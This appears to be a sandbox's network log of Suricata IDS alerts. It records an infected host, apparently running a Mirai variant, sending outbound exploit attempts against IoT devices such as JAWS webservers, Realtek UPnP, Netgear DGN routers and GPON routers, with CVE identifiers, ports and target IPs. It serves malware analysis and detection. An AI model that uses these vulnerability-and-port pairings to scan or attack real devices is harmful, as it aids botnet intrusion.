                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55934 -> 84.119.107.118:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60400 -> 39.227.72.155:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60400 -> 39.227.72.155:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:35422 -> 185.249.96.80:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34374 -> 78.132.73.224:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:55898 -> 85.52.221.218:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:55920 -> 128.91.58.4:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:42434 -> 94.215.141.54:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47860 -> 86.240.223.174:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40404 -> 139.210.155.192:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59598 -> 102.187.77.194:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60602 -> 121.177.118.150:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51144 -> 181.219.130.184:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36152 -> 175.171.246.250:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53394 -> 160.14.3.218:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56086 -> 204.30.144.174:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56086 -> 204.30.144.174:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38838 -> 191.59.214.138:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56476 -> 203.102.228.87:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55668 -> 156.158.132.221:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45952 -> 107.108.113.107:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:48580 -> 45.52.252.78:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39076 -> 216.224.95.80:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39232 -> 99.207.247.232:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39232 -> 99.207.247.232:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36482 -> 64.132.168.64:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56896 -> 166.196.205.22:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51144 -> 181.219.130.184:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37098 -> 138.112.67.100:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33322 -> 125.187.103.250:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44058 -> 162.56.247.74:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:44326 -> 180.188.222.161:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53162 -> 140.22.65.76:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58148 -> 200.230.30.18:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41842 -> 184.80.231.138:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38304 -> 178.16.80.106:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40512 -> 18.179.120.132:5555
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38304 -> 178.16.80.106:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49344 -> 78.126.194.179:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57208 -> 103.231.22.13:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49344 -> 78.126.194.179:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37556 -> 20.164.209.99:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60862 -> 25.128.176.48:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34506 -> 48.133.51.155:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37318 -> 132.199.20.209:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36084 -> 43.139.176.218:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50802 -> 205.52.53.240:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42296 -> 204.63.42.89:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50582 -> 79.22.85.51:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35102 -> 16.102.200.139:5555
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50582 -> 79.22.85.51:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48118 -> 33.72.49.85:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38142 -> 209.75.120.198:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57654 -> 30.199.225.176:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:60274 -> 101.203.94.126:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:37440 -> 94.177.142.161:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43520 -> 69.249.109.177:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:43836 -> 84.191.42.55:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42800 -> 196.223.36.172:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:60760 -> 48.117.0.63:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40208 -> 158.99.48.169:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57690 -> 50.184.254.142:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36132 -> 207.54.29.76:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42070 -> 156.82.219.223:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57150 -> 149.149.230.210:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48832 -> 16.177.230.17:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:57466 -> 22.188.96.97:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44886 -> 173.106.78.35:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46678 -> 160.212.70.21:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:45792 -> 81.139.77.76:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:37144 -> 157.232.42.141:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36178 -> 22.45.118.250:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:51864 -> 27.76.195.81:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46350 -> 149.81.97.242:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46534 -> 96.99.41.130:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43540 -> 157.184.128.35:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60798 -> 112.153.207.115:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34340 -> 27.39.220.124:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44166 -> 59.9.127.185:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56040 -> 46.183.211.158:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33744 -> 158.86.239.37:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56040 -> 46.183.211.158:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42070 -> 156.82.219.223:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:54338 -> 157.77.71.177:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52294 -> 197.68.216.109:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54212 -> 188.84.47.83:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50988 -> 217.144.221.208:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:45448 -> 106.46.13.150:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42286 -> 18.15.162.21:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38734 -> 96.170.47.107:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50436 -> 131.116.99.90:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58374 -> 15.46.95.211:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58374 -> 15.46.95.211:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:57186 -> 140.128.108.40:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59878 -> 133.125.92.48:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44086 -> 115.60.230.213:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:41460 -> 40.156.170.132:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51658 -> 48.181.195.14:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36030 -> 26.105.98.70:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:42586 -> 8.107.105.120:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:43440 -> 202.113.87.111:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33500 -> 140.24.155.93:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:34672 -> 15.208.50.250:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59872 -> 26.69.100.31:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55116 -> 64.77.154.219:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56356 -> 45.108.234.239:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:55870 -> 56.100.184.78:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55726 -> 9.174.94.208:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59614 -> 199.92.69.73:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36370 -> 136.136.129.33:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35170 -> 16.77.80.254:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:36572 -> 113.11.42.76:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:57842 -> 196.158.249.168:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58408 -> 21.134.232.205:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56418 -> 95.86.254.133:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53720 -> 9.23.74.64:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:34332 -> 97.104.12.29:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45958 -> 164.50.155.210:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51244 -> 111.77.188.193:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35838 -> 54.118.74.41:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46338 -> 5.66.245.147:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46338 -> 5.66.245.147:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40496 -> 116.71.38.216:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59072 -> 189.98.38.229:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39906 -> 115.155.24.23:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47784 -> 168.216.138.12:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56418 -> 95.86.254.133:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36252 -> 215.153.214.163:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46942 -> 99.76.48.158:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59802 -> 189.65.195.18:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50770 -> 4.46.56.44:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:55624 -> 81.101.181.75:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51046 -> 129.30.155.167:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46862 -> 39.139.249.97:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57032 -> 8.84.61.38:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55346 -> 221.232.130.20:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53398 -> 96.215.244.85:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58124 -> 115.154.10.118:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39422 -> 53.76.178.29:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39422 -> 53.76.178.29:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:42954 -> 221.56.144.117:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40388 -> 154.211.50.52:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:45670 -> 75.46.156.121:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54752 -> 6.202.218.89:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59242 -> 132.196.243.104:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:57452 -> 35.167.30.58:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47926 -> 45.104.230.8:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58148 -> 214.171.62.194:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34524 -> 89.69.164.227:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59014 -> 132.49.92.222:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45740 -> 15.182.220.70:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60808 -> 130.229.101.197:7574
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45740 -> 15.182.220.70:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:52340 -> 170.10.186.243:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41308 -> 78.103.46.151:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41308 -> 78.103.46.151:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:40410 -> 119.22.161.221:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53188 -> 167.239.72.58:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57308 -> 113.173.184.52:49152
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53096 -> 43.79.133.11:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:39370 -> 80.180.109.86:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:51946 -> 160.64.200.250:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:47792 -> 152.156.223.170:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:46252 -> 1.98.140.42:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:49194 -> 68.42.36.210:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:35422 -> 142.225.53.129:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:38960 -> 102.154.96.78:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:54214 -> 174.112.238.150:8080
